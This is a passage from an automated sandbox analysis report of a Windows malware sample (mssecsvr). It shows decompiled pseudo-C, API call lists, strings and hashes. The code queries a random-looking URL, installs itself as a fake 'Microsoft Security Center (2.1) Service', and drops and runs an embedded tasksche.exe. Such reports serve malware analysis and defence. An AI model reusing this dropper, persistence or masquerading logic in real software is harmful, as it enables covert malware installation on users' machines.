                                                                                            Start date:22/12/2022
                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                            Imagebase:0x7ff651c80000
                                                                                            File size:51288 bytes
                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language

                                                                                            Target ID:19
                                                                                            Start time:10:04:35
                                                                                            Start date:22/12/2022
                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:c:\windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc
                                                                                            Imagebase:0x7ff651c80000
                                                                                            File size:51288 bytes
                                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language

                                                                                            Target ID:20
                                                                                            Start time:10:05:35
                                                                                            Start date:22/12/2022
                                                                                            Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                                                                            Imagebase:0x7ff630b00000
                                                                                            File size:455656 bytes
                                                                                            MD5 hash:A267555174BFA53844371226F482B86B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language

                                                                                            Target ID:21
                                                                                            Start time:10:05:35
                                                                                            Start date:22/12/2022
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff745070000
                                                                                            File size:625664 bytes
                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language

                                                                                            Reset < >

                                                                                              Execution Graph

                                                                                              Execution Coverage:71.7%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:63.2%
                                                                                              Total number of Nodes:38
                                                                                              Total number of Limit Nodes:9
                                                                                              execution_graph 63 409a16 __set_app_type __p__fmode __p__commode 64 409a85 63->64 65 409a99 64->65 66 409a8d __setusermatherr 64->66 75 409b8c _controlfp 65->75 66->65 68 409a9e _initterm __getmainargs _initterm 69 409af2 GetStartupInfoA 68->69 71 409b26 GetModuleHandleA 69->71 76 408140 InternetOpenA InternetOpenUrlA 71->76 75->68 77 4081a7 InternetCloseHandle InternetCloseHandle 76->77 80 408090 GetModuleFileNameA __p___argc 77->80 79 4081b2 exit _XcptFilter 81 4080b0 80->81 82 4080b9 OpenSCManagerA 80->82 91 407f20 81->91 83 408101 StartServiceCtrlDispatcherA 82->83 84 4080cf OpenServiceA 82->84 83->79 86 4080fc CloseServiceHandle 84->86 87 4080ee 84->87 86->83 96 407fa0 ChangeServiceConfig2A 87->96 90 4080f6 CloseServiceHandle 90->86 108 407c40 sprintf OpenSCManagerA 91->108 93 407f25 97 407ce0 GetModuleHandleW 93->97 96->90 98 407d01 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 97->98 99 407f08 97->99 98->99 100 407d49 98->100 99->79 100->99 101 407d69 FindResourceA 100->101 101->99 102 407d84 LoadResource 101->102 102->99 103 407d94 LockResource 102->103 103->99 104 407da7 SizeofResource 103->104 104->99 105 407db9 sprintf sprintf MoveFileExA CreateFileA 104->105 105->99 106 407e54 WriteFile FindCloseChangeNotification CreateProcessA 105->106 106->99 107 407ef2 CloseHandle CloseHandle 106->107 107->99 109 407c74 CreateServiceA 108->109 110 407cca 108->110 111 407cbb CloseServiceHandle 109->111 112 407cad StartServiceA CloseServiceHandle 109->112 110->93 111->93 112->111

                                                                                              Callgraph

                                                                                              Control-flow Graph

                                                                                              C-Code - Quality: 86%
                                                                                              			E00407CE0() {
                                                                                              				void _v259;
                                                                                              				char _v260;
                                                                                              				void _v519;
                                                                                              				char _v520;
                                                                                              				struct _STARTUPINFOA _v588;
                                                                                              				struct _PROCESS_INFORMATION _v604;
                                                                                              				long _v608;
                                                                                              				_Unknown_base(*)()* _t36;
                                                                                              				void* _t38;
                                                                                              				void* _t39;
                                                                                              				void* _t50;
                                                                                              				int _t59;
                                                                                              				struct HINSTANCE__* _t104;
                                                                                              				struct HRSRC__* _t105;
                                                                                              				void* _t107;
                                                                                              				void* _t108;
                                                                                              				long _t109;
                                                                                              				intOrPtr _t121;
                                                                                              				intOrPtr _t122;
                                                                                              
                                                                                              				_t104 = GetModuleHandleW(L"kernel32.dll");
                                                                                              				if(_t104 != 0) {
                                                                                              					 *0x431478 = GetProcAddress(_t104, "CreateProcessA");
                                                                                              					 *0x431458 = GetProcAddress(_t104, "CreateFileA");
                                                                                              					 *0x431460 = GetProcAddress(_t104, "WriteFile");
                                                                                              					_t36 = GetProcAddress(_t104, "CloseHandle");
                                                                                              					 *0x43144c = _t36;
                                                                                              					if( *0x431478 != 0) {
                                                                                              						_t121 =  *0x431458; // 0x74d0f7b0
                                                                                              						if(_t121 != 0) {
                                                                                              							_t122 =  *0x431460; // 0x74d0fc30
                                                                                              							if(_t122 != 0 && _t36 != 0) {
                                                                                              								_t105 = FindResourceA(0, 0x727, "R");
                                                                                              								if(_t105 != 0) {
                                                                                              									_t38 = LoadResource(0, _t105);
                                                                                              									if(_t38 != 0) {
                                                                                              										_t39 = LockResource(_t38);
                                                                                              										_v608 = _t39;
                                                                                              										if(_t39 != 0) {
                                                                                              											_t109 = SizeofResource(0, _t105);
                                                                                              											if(_t109 != 0) {
                                                                                              												_v520 = 0;
                                                                                              												memset( &_v519, 0, 0x40 << 2);
                                                                                              												asm("stosw");
                                                                                              												asm("stosb");
                                                                                              												_v260 = 0;
                                                                                              												memset( &_v259, 0, 0x40 << 2);
                                                                                              												asm("stosw");
                                                                                              												asm("stosb");
                                                                                              												sprintf( &_v520, "C:\\%s\\%s", "WINDOWS", "tasksche.exe");
                                                                                              												sprintf( &_v260, "C:\\%s\\qeriuwjhrf", "WINDOWS");
                                                                                              												MoveFileExA( &_v520,  &_v260, 1); // executed
                                                                                              												_t50 = CreateFileA( &_v520, 0x40000000, 0, 0, 2, 4, 0); // executed
                                                                                              												_t107 = _t50;
                                                                                              												if(_t107 != 0xffffffff) {
                                                                                              													WriteFile(_t107, _v608, _t109,  &_v608, 0); // executed
                                                                                              													FindCloseChangeNotification(_t107); // executed
                                                                                              													_v604.hThread = 0;
                                                                                              													_v604.dwProcessId = 0;
                                                                                              													_v604.dwThreadId = 0;
                                                                                              													memset( &(_v588.lpReserved), 0, 0x10 << 2);
                                                                                              													asm("repne scasb");
                                                                                              													_v604.hProcess = 0;
                                                                                              													_t108 = " /i";
                                                                                              													asm("repne scasb");
                                                                                              													memcpy( &_v520 - 1, _t108, 0 << 2);
                                                                                              													memcpy(_t108 + 0x175b75a, _t108, 0);
                                                                                              													_v588.cb = 0x44;
                                                                                              													_v588.wShowWindow = 0;
                                                                                              													_v588.dwFlags = 0x81;
                                                                                              													_t59 = CreateProcessA(0,  &_v520, 0, 0, 0, 0x8000000, 0, 0,  &_v588,  &_v604); // executed
                                                                                              													if(_t59 != 0) {
                                                                                              														CloseHandle(_v604.hThread);
                                                                                              														CloseHandle(_v604);
                                                                                              													}
                                                                                              												}
                                                                                              											}
                                                                                              										}
                                                                                              									}
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              				return 0;
                                                                                              			}






















                                                                                              0x00407cf5
                                                                                              0x00407cfb
                                                                                              0x00407d15
                                                                                              0x00407d22
                                                                                              0x00407d2f
                                                                                              0x00407d34
                                                                                              0x00407d3c
                                                                                              0x00407d43
                                                                                              0x00407d49
                                                                                              0x00407d4f
                                                                                              0x00407d55
                                                                                              0x00407d5b
                                                                                              0x00407d7a
                                                                                              0x00407d7e
                                                                                              0x00407d86
                                                                                              0x00407d8e
                                                                                              0x00407d95
                                                                                              0x00407d9d
                                                                                              0x00407da1
                                                                                              0x00407daf
                                                                                              0x00407db3
                                                                                              0x00407dc4
                                                                                              0x00407dc8
                                                                                              0x00407dca
                                                                                              0x00407dcc
                                                                                              0x00407ddb
                                                                                              0x00407de2
                                                                                              0x00407def
                                                                                              0x00407df1
                                                                                              0x00407e01
                                                                                              0x00407e18
                                                                                              0x00407e2c
                                                                                              0x00407e43
                                                                                              0x00407e49
                                                                                              0x00407e4e
                                                                                              0x00407e61
                                                                                              0x00407e68
                                                                                              0x00407e72
                                                                                              0x00407e7a
                                                                                              0x00407e82
                                                                                              0x00407e8b
                                                                                              0x00407e95
                                                                                              0x00407e9b
                                                                                              0x00407e9f
                                                                                              0x00407ea8
                                                                                              0x00407eb0
                                                                                              0x00407ebc
                                                                                              0x00407ed3
                                                                                              0x00407edb
                                                                                              0x00407ee0
                                                                                              0x00407ee8
                                                                                              0x00407ef0
                                                                                              0x00407ef7
                                                                                              0x00407f02
                                                                                              0x00407f02
                                                                                              0x00407ef0
                                                                                              0x00407e4e
                                                                                              0x00407db3
                                                                                              0x00407da1
                                                                                              0x00407d8e
                                                                                              0x00407d7e
                                                                                              0x00407d5b
                                                                                              0x00407d4f
                                                                                              0x00407d43
                                                                                              0x00407f14

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,6FB7FB10,?,00000000), ref: 00407CEF
                                                                                              • GetProcAddress.KERNEL32(00000000,CreateProcessA), ref: 00407D0D
                                                                                              • GetProcAddress.KERNEL32(00000000,CreateFileA), ref: 00407D1A
                                                                                              • GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00407D27
                                                                                              • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00407D34
                                                                                              • FindResourceA.KERNEL32(00000000,00000727,0043137C), ref: 00407D74
                                                                                              • LoadResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407D86
                                                                                              • LockResource.KERNEL32(00000000,?,00000000), ref: 00407D95
                                                                                              • SizeofResource.KERNEL32(00000000,00000000,?,00000000), ref: 00407DA9
                                                                                              • sprintf.MSVCRT ref: 00407E01
                                                                                              • sprintf.MSVCRT ref: 00407E18
                                                                                              • MoveFileExA.KERNEL32 ref: 00407E2C
                                                                                              • CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000004,00000000), ref: 00407E43
                                                                                              • WriteFile.KERNELBASE(00000000,?,00000000,?,00000000), ref: 00407E61
                                                                                              • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00407E68
                                                                                              • CreateProcessA.KERNELBASE ref: 00407EE8
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00407EF7
                                                                                              • CloseHandle.KERNEL32(08000000), ref: 00407F02
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.254757710.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.254744236.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.254780318.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.254787485.000000000040B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.254798373.000000000040F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.254832122.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.254872672.0000000000710000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_mssecsvr.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressProcResource$CloseFileHandle$CreateFindsprintf$ChangeLoadLockModuleMoveNotificationProcessSizeofWrite
                                                                                              • String ID: /i$C:\%s\%s$C:\%s\qeriuwjhrf$CloseHandle$CreateFileA$CreateProcessA$D$WINDOWS$WriteFile$kernel32.dll$tasksche.exe
                                                                                              • API String ID: 1541710770-1507730452
                                                                                              • Opcode ID: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
                                                                                              • Instruction ID: 13a48b3e7e70fc1f7524b3ea2ca00aec236584d0bbebcf852995d03268f4a9c8
                                                                                              • Opcode Fuzzy Hash: fb819ea0bbfac7cba45177718834bfaea6ecb5a57a4692884010a03d6946efb9
                                                                                              • Instruction Fuzzy Hash: B15197715043496FE7109F74DC84AAB7B98EB88354F14493EF651A32E0DA7898088BAA
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              C-Code - Quality: 71%
                                                                                              			_entry_(void* __ebx, void* __edi, void* __esi) {
                                                                                              				CHAR* _v8;
                                                                                              				intOrPtr* _v24;
                                                                                              				intOrPtr _v28;
                                                                                              				struct _STARTUPINFOA _v96;
                                                                                              				int _v100;
                                                                                              				char** _v104;
                                                                                              				int _v108;
                                                                                              				void _v112;
                                                                                              				char** _v116;
                                                                                              				intOrPtr* _v120;
                                                                                              				intOrPtr _v124;
                                                                                              				void* _t27;
                                                                                              				intOrPtr _t36;
                                                                                              				signed int _t38;
                                                                                              				int _t40;
                                                                                              				intOrPtr* _t41;
                                                                                              				intOrPtr _t42;
                                                                                              				intOrPtr _t49;
                                                                                              				intOrPtr* _t55;
                                                                                              				intOrPtr _t58;
                                                                                              				intOrPtr _t61;
                                                                                              
                                                                                              				_push(0xffffffff);
                                                                                              				_push(0x40a1a0);
                                                                                              				_push(0x409ba2);
                                                                                              				_push( *[fs:0x0]);
                                                                                              				 *[fs:0x0] = _t58;
                                                                                              				_v28 = _t58 - 0x68;
                                                                                              				_v8 = 0;
                                                                                              				__set_app_type(2);
                                                                                              				 *0x70f894 =  *0x70f894 | 0xffffffff;
                                                                                              				 *0x70f898 =  *0x70f898 | 0xffffffff;
                                                                                              				 *(__p__fmode()) =  *0x70f88c;
                                                                                              				 *(__p__commode()) =  *0x70f888;
                                                                                              				 *0x70f890 = _adjust_fdiv;
                                                                                              				_t27 = E00409BA1( *_adjust_fdiv);
                                                                                              				_t61 =  *0x431410; // 0x1
                                                                                              				if(_t61 == 0) {
                                                                                              					__setusermatherr(E00409B9E);
                                                                                              				}
                                                                                              				E00409B8C(_t27);
                                                                                              				_push(0x40b010);
                                                                                              				_push(0x40b00c);
                                                                                              				L00409B86();
                                                                                              				_v112 =  *0x70f884;
                                                                                              				__getmainargs( &_v100,  &_v116,  &_v104,  *0x70f880,  &_v112);
                                                                                              				_push(0x40b008);
                                                                                              				_push(0x40b000); // executed
                                                                                              				L00409B86(); // executed
                                                                                              				_t55 =  *_acmdln;
                                                                                              				_v120 = _t55;
                                                                                              				if( *_t55 != 0x22) {
                                                                                              					while( *_t55 > 0x20) {
                                                                                              						_t55 = _t55 + 1;
                                                                                              						_v120 = _t55;
                                                                                              					}
                                                                                              				} else {
                                                                                              					do {
                                                                                              						_t55 = _t55 + 1;
                                                                                              						_v120 = _t55;
                                                                                              						_t42 =  *_t55;
                                                                                              					} while (_t42 != 0 && _t42 != 0x22);
                                                                                              					if( *_t55 == 0x22) {
                                                                                              						L6:
                                                                                              						_t55 = _t55 + 1;
                                                                                              						_v120 = _t55;
                                                                                              					}
                                                                                              				}
                                                                                              				_t36 =  *_t55;
                                                                                              				if(_t36 != 0 && _t36 <= 0x20) {
                                                                                              					goto L6;
                                                                                              				}
                                                                                              				_v96.dwFlags = 0;
                                                                                              				GetStartupInfoA( &_v96);
                                                                                              				if((_v96.dwFlags & 0x00000001) == 0) {
                                                                                              					_t38 = 0xa;
                                                                                              				} else {
                                                                                              					_t38 = _v96.wShowWindow & 0x0000ffff;
                                                                                              				}
                                                                                              				_push(_t38);
                                                                                              				_push(_t55);
                                                                                              				_push(0);
                                                                                              				_push(GetModuleHandleA(0));
                                                                                              				_t40 = E00408140();
                                                                                              				_v108 = _t40;
                                                                                              				exit(_t40); // executed
                                                                                              				_t41 = _v24;
                                                                                              				_t49 =  *((intOrPtr*)( *_t41));
                                                                                              				_v124 = _t49;
                                                                                              				_push(_t41);
                                                                                              				_push(_t49);
                                                                                              				L00409B80();
                                                                                              				return _t41;
                                                                                              			}
























                                                                                              0x00409a19
                                                                                              0x00409a1b
                                                                                              0x00409a20
                                                                                              0x00409a2b
                                                                                              0x00409a2c
                                                                                              0x00409a39
                                                                                              0x00409a3e
                                                                                              0x00409a43
                                                                                              0x00409a4a
                                                                                              0x00409a51
                                                                                              0x00409a64
                                                                                              0x00409a72
                                                                                              0x00409a7b
                                                                                              0x00409a80
                                                                                              0x00409a85
                                                                                              0x00409a8b
                                                                                              0x00409a92
                                                                                              0x00409a98
                                                                                              0x00409a99
                                                                                              0x00409a9e
                                                                                              0x00409aa3
                                                                                              0x00409aa8
                                                                                              0x00409ab2
                                                                                              0x00409acb
                                                                                              0x00409ad1
                                                                                              0x00409ad6
                                                                                              0x00409adb
                                                                                              0x00409ae8
                                                                                              0x00409aea
                                                                                              0x00409af0
                                                                                              0x00409b2c
                                                                                              0x00409b31
                                                                                              0x00409b32
                                                                                              0x00409b32
                                                                                              0x00409af2
                                                                                              0x00409af2
                                                                                              0x00409af2
                                                                                              0x00409af3
                                                                                              0x00409af6
                                                                                              0x00409af8
                                                                                              0x00409b03
                                                                                              0x00409b05
                                                                                              0x00409b05
                                                                                              0x00409b06
                                                                                              0x00409b06
                                                                                              0x00409b03
                                                                                              0x00409b09
                                                                                              0x00409b0d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00409b13
                                                                                              0x00409b1a
                                                                                              0x00409b24
                                                                                              0x00409b39
                                                                                              0x00409b26
                                                                                              0x00409b26
                                                                                              0x00409b26
                                                                                              0x00409b3a
                                                                                              0x00409b3b
                                                                                              0x00409b3c
                                                                                              0x00409b44
                                                                                              0x00409b45
                                                                                              0x00409b4a
                                                                                              0x00409b4e
                                                                                              0x00409b54
                                                                                              0x00409b59
                                                                                              0x00409b5b
                                                                                              0x00409b5e
                                                                                              0x00409b5f
                                                                                              0x00409b60
                                                                                              0x00409b67

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.254757710.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.254744236.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.254780318.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.254787485.000000000040B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.254798373.000000000040F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.254832122.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.254872672.0000000000710000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_mssecsvr.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                                                              • String ID:
                                                                                              • API String ID: 801014965-0
                                                                                              • Opcode ID: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
                                                                                              • Instruction ID: f220c78e044b43db95b39954543cb8470338bddc8e57b6bf74c51ec52977e19a
                                                                                              • Opcode Fuzzy Hash: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
                                                                                              • Instruction Fuzzy Hash: AF415E71800348EFDB24DFA4ED45AAA7BB8FB09720F20413BE451A72D2D7786841CB59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              C-Code - Quality: 77%
                                                                                              			E00408140() {
                                                                                              				char* _v1;
                                                                                              				char* _v3;
                                                                                              				char* _v7;
                                                                                              				char* _v11;
                                                                                              				char* _v15;
                                                                                              				char* _v19;
                                                                                              				char* _v23;
                                                                                              				void _v80;
                                                                                              				char _v100;
                                                                                              				char* _t12;
                                                                                              				void* _t13;
                                                                                              				void* _t27;
                                                                                              
                                                                                              				_t12 = memcpy( &_v80, "http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com", 0xe << 2);
                                                                                              				asm("movsb");
                                                                                              				_v23 = _t12;
                                                                                              				_v19 = _t12;
                                                                                              				_v15 = _t12;
                                                                                              				_v11 = _t12;
                                                                                              				_v7 = _t12;
                                                                                              				_v3 = _t12;
                                                                                              				_v1 = _t12;
                                                                                              				_t13 = InternetOpenA(_t12, 1, _t12, _t12, _t12); // executed
                                                                                              				_t27 = _t13;
                                                                                              				InternetOpenUrlA(_t27,  &_v100, 0, 0, 0x84000000, 0); // executed
                                                                                              				_push(_t27);
                                                                                              				InternetCloseHandle(); // executed
                                                                                              				InternetCloseHandle(0);
                                                                                              				E00408090();
                                                                                              				return 0;
                                                                                              			}















                                                                                              0x00408155
                                                                                              0x00408157
                                                                                              0x00408158
                                                                                              0x0040815c
                                                                                              0x00408160
                                                                                              0x00408164
                                                                                              0x00408168
                                                                                              0x0040816c
                                                                                              0x00408177
                                                                                              0x0040817b
                                                                                              0x0040818e
                                                                                              0x00408194
                                                                                              0x0040819c
                                                                                              0x004081a7
                                                                                              0x004081ab
                                                                                              0x004081ad
                                                                                              0x004081b9

                                                                                              APIs
                                                                                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040817B
                                                                                              • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 00408194
                                                                                              • InternetCloseHandle.WININET(00000000), ref: 004081A7
                                                                                              • InternetCloseHandle.WININET(00000000), ref: 004081AB
                                                                                                • Part of subcall function 00408090: GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
                                                                                                • Part of subcall function 00408090: __p___argc.MSVCRT ref: 004080A5
                                                                                              Strings
                                                                                              • http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com, xrefs: 0040814A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.254757710.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.254744236.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.254780318.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.254787485.000000000040B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.254798373.000000000040F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.254832122.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.254872672.0000000000710000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_mssecsvr.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Internet$CloseHandleOpen$FileModuleName__p___argc
                                                                                              • String ID: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwff.com
                                                                                              • API String ID: 774561529-2614457033
                                                                                              • Opcode ID: 0bbc0dabe610ff42f1f9ad6e85cc21407dd9b1b68127969cd029bea3a518856a
                                                                                              • Instruction ID: 3b8a91e0baa4f3639afdb349cfc438007093f0a6557163af6b5eb03d237fc32a
                                                                                              • Opcode Fuzzy Hash: 0bbc0dabe610ff42f1f9ad6e85cc21407dd9b1b68127969cd029bea3a518856a
                                                                                              • Instruction Fuzzy Hash: B3018671548310AEE310DF748D01B6B7BE9EF85710F01082EF984F72C0EAB59804876B
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              C-Code - Quality: 100%
                                                                                              			E00407C40() {
                                                                                              				char _v260;
                                                                                              				void* _t15;
                                                                                              				void* _t17;
                                                                                              
                                                                                              				sprintf( &_v260, "%s -m security", 0x70f760);
                                                                                              				_t15 = OpenSCManagerA(0, 0, 0xf003f);
                                                                                              				if(_t15 == 0) {
                                                                                              					return 0;
                                                                                              				} else {
                                                                                              					_t17 = CreateServiceA(_t15, "mssecsvc2.1", "Microsoft Security Center (2.1) Service", 0xf01ff, 0x10, 2, 1,  &_v260, 0, 0, 0, 0, 0);
                                                                                              					if(_t17 != 0) {
                                                                                              						StartServiceA(_t17, 0, 0);
                                                                                              						CloseServiceHandle(_t17);
                                                                                              					}
                                                                                              					CloseServiceHandle(_t15);
                                                                                              					return 0;
                                                                                              				}
                                                                                              			}






                                                                                              0x00407c56
                                                                                              0x00407c6e
                                                                                              0x00407c72
                                                                                              0x00407cd3
                                                                                              0x00407c74
                                                                                              0x00407ca7
                                                                                              0x00407cab
                                                                                              0x00407cb2
                                                                                              0x00407cb9
                                                                                              0x00407cb9
                                                                                              0x00407cbc
                                                                                              0x00407cc9
                                                                                              0x00407cc9

                                                                                              APIs
                                                                                              • sprintf.MSVCRT ref: 00407C56
                                                                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00407C68
                                                                                              • CreateServiceA.ADVAPI32(00000000,mssecsvc2.1,Microsoft Security Center (2.1) Service,000F01FF,00000010,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000,6FB7FB10,00000000), ref: 00407C9B
                                                                                              • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00407CB2
                                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 00407CB9
                                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 00407CBC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.254757710.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000005.00000002.254744236.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.254780318.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.254787485.000000000040B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.254798373.000000000040F000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.254832122.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000005.00000002.254872672.0000000000710000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_400000_mssecsvr.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Service$CloseHandle$CreateManagerOpenStartsprintf
                                                                                              • String ID: %s -m security$Microsoft Security Center (2.1) Service$mssecsvc2.1
                                                                                              • API String ID: 3340711343-2450984573
                                                                                              • Opcode ID: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
                                                                                              • Instruction ID: 2288e5cc66680fabefb91112cf05624c6df81315eb9d87428618c258e2ee617f
                                                                                              • Opcode Fuzzy Hash: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
                                                                                              • Instruction Fuzzy Hash: AD01D1717C43043BF2305B149D8BFEB3658AB84F01F500025FB44B92D0DAF9A81491AF
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              C-Code - Quality: 86%
                                                                                              			E00408090() {
                                                                                              				char* _v4;
                                                                                              				char* _v8;
                                                                                              				intOrPtr _v12;
                                                                                              				struct _SERVICE_TABLE_ENTRY _v16;
                                                                                              				long _t6;
                                                                                              				void* _t19;
                                                                                              				void* _t22;
                                                                                              
                                                                                              				_t6 = GetModuleFileNameA(0, 0x70f760, 0x104);
                                                                                              				__imp____p___argc();
                                                                                              				_t26 =  *_t6 - 2;
                                                                                              				if( *_t6 >= 2) {
                                                                                              					_t19 = OpenSCManagerA(0, 0, 0xf003f);
                                                                                              					__eflags = _t19;
                                                                                              					if(_t19 != 0) {
                                                                                              						_t22 = OpenServiceA(_t19, "mssecsvc2.1", 0xf01ff);
                                                                                              						__eflags = _t22;
                                                                                              						if(_t22 != 0) {
                                                                                              							E00407FA0(_t22, 0x3c);
                                                                                              							CloseServiceHandle(_t22);
                                                                                              						}
                                                                                              						CloseServiceHandle(_t19);
                                                                                              					}
                                                                                              					_v16 = "mssecsvc2.1";
                                                                                              					_v12 = 0x408000;
                                                                                              					_v8 = 0;
                                                                                              					_v4 = 0;
                                                                                              					return StartServiceCtrlDispatcherA( &_v16);
                                                                                              				} else {
                                                                                              					return E00407F20(_t26);
                                                                                              				}
                                                                                              			}










                                                                                              0x0040809f
                                                                                              0x004080a5
                                                                                              0x004080ab
                                                                                              0x004080ae
                                                                                              0x004080c9
                                                                                              0x004080cb
                                                                                              0x004080cd
                                                                                              0x004080e8
                                                                                              0x004080ea
                                                                                              0x004080ec
                                                                                              0x004080f1
                                                                                              0x004080fa
                                                                                              0x004080fa
                                                                                              0x004080fd
                                                                                              0x00408100
                                                                                              0x00408105
                                                                                              0x0040810e
                                                                                              0x00408116
                                                                                              0x0040811e
                                                                                              0x00408130
                                                                                              0x004080b0
                                                                                              0x004080b8
                                                                                              0x004080b8

                                                                                              APIs
